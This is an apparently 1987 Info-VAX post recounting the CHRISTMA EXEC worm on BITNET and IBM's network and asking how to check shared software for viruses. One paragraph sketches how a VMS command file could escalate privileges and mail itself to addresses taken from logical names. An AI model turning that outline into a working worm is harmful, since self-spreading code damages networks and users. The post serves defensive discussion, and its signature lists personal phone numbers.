PYM@QUCDNSUR.BITNET (Dr John Pym [Cardiothoracic Surgery]) (12/28/87)
Compliments of the Season to the net.
By now, many of you will have heard of the (infamous) CHRISTMA EXEC
"virus" which infected BITNET/EARN/NETNORTH and virtually paralyzed IBM's
internal network for a day or two. For those who haven't seen the
various postings on the BITNET LINKFAIL list, RISKS-FORUM Digest, etc., I
will summarize (no flames for the oversimplifications in the interest of
brevity, please). Originating as a "prank" on a German end-node on EARN,
this EXEC (i.e. similar to a .COM file - and written in REXX, a DCL-like
language) displayed, when executed on an IBM VM system, a primitive
christmas tree on the terminal and then mailed itself to everyone on that
poor user's NAMES file (i.e. personal mailing name list) before deleting
itself. Of course, some users had network distribution lists (e.g.
JNET-L, MEDINF-L, etc.) defined in their NAMES file . . . [I
personally received six copies of this EXEC from different sources - this
is probably not unusual.]
While this was a significant problem on BITNET/EARN/NETNORTH with a
fair number of VM/CMS nodes, the virus clearly could not infect VAXinated
nodes, of which there are a larger number. Also, many (usually
undergraduate) students on VM/CMS systems are denied network access, thus
limiting the rate of spread of the virus beyond an infected system.
However, once the virus entered VNET, IBM's internal network of VM/CMS
systems, things really took off (all VM/CMS systems; users with large
NAMES files; all with network access) and allegedly brought their
network to a standstill.
Initially, the problem required manual intervention by system
managers to purge CHRISTMA EXECs from users' readers - but this could
only give a temporary remission in the disease. Fortunately, a CHRISTMA
eradicator was written (by Eric Thomas, author of the LISTSERV software),
and also an ingenious virus was developed (by Hank ?, sorry, I've
forgotten) to follow and destroy the original CHRISTMA virus and then
self-destruct in mid-January. So now it's eradicated like smallpox:
hmmm . . . I expect that there may be another minor epidemic when some
users return from vacation.
So, what should we do? Laugh at IBM? Say "It can't happen to me."
Look at all those experienced, computer-wise IBMers who ran CHRISTMA
EXEC. Oh yes, there will be flames . . . platitudes about NEVER using
any software which you haven't written yourself - or is written by
someone you TRUST ABSOLUTELY :-) . . . flames about chain letters
and viruses on the network . . . their authors should be boiled in oil
/ set in RA81 air filter glue / sentenced to do 10 years of RSX SYSGENs /
locked in a room with only an IBM PC / (substitute your favourite
nightmare here). Let's just think a little before flaming.
Could a "harmless" CHRISTMA-like virus attack a VAX/VMS system? A
recent network posting (RISKS?, LINKFAIL?) mentioned the possibility of a
virus hidden in SHAR files which are _executed_ as .COM files to unpack
them. SHAR files are, after all, an excellent method for _reliable_
software distribution over gateways. (This is not meant to reflect
negatively on Michael Bednarek in any way - VMSHAR is a great
contribution and we all have used it or will use it.) But . . . nobody
unpacks one of these distributions with PRIVs turned on, do we? Could
such a virus, like CHRISTMA EXEC, replicate from a non-privileged account
(apart from doing a SET PROC/PRIV=ALL quietly in the middle of the file)?
Certainly, VMS Mail won't allow wildcard SEND (and JNET won't allow a
wildcard SEND/FILE), but, for example, a .COM file could do a SHOW
LOGICAL/OUTPUT=CRACKER.TMP, look for logicals with syntax "jnet%",
"BITNET%", "IN%", etc. and try mailing itself to these addresses. (No
flames about giving state secrets to the enemy, please. Blind Freddy
could have seen that one.)
We may not be able to read a SHAR file in its entirety (looking for
a virus in a few thousand blocks of code), but I for one am certainly
going to "quarantine" it as far as possible, SEARCHing it for more than a
few key words before unpacking it from a non-privileged (either default
or authorized) account. Further suggestions from the more devious minds
on the list would be welcome, please. Ignorance may be bliss, but it is
definitely NOT SAFE.
Most if not all of us have public domain software running on our
systems - or programs written by students and our colleagues
(trustworthy, of course :-} ). How many VAX/VMS systems do _not_ use at
least one piece of DECUS software? This PD software, even if not
essential, makes life easier and/or saves hours of work. Software
exchange isn't going to stop now, nor should it. We must be vigilant,
both for our own safety, and as a responsibility to colleagues on the
network. We must make all reasonable efforts to check before executing
software ourselves or posting it to the net - or making it available for
FTP or putting it on a BITNET LISTSERV. CHRISTMA EXEC comes but once a
year, but a virus can be forever.
Comments from the Info-VAX gurus would be appreciated. What are the
guidelines for "safe software exchange"? What are the best methods of
checking software for viral contamination, granted that we are going to
continue to exchange it?
John Pym
BITNET: PYM@QUCDNSUR Real life: Dr. John Pym
(POSTMASTER@QUCDNSUR) Department of Surgery
Telephone (613)549-3898 - office Queen's University
(613)548-4879 - home Kingston. Ontario
(613)541-7792 - cellular CANADA. K7L 2V6
Chairman, THISLUG (DECUS Thousand Islands LUG)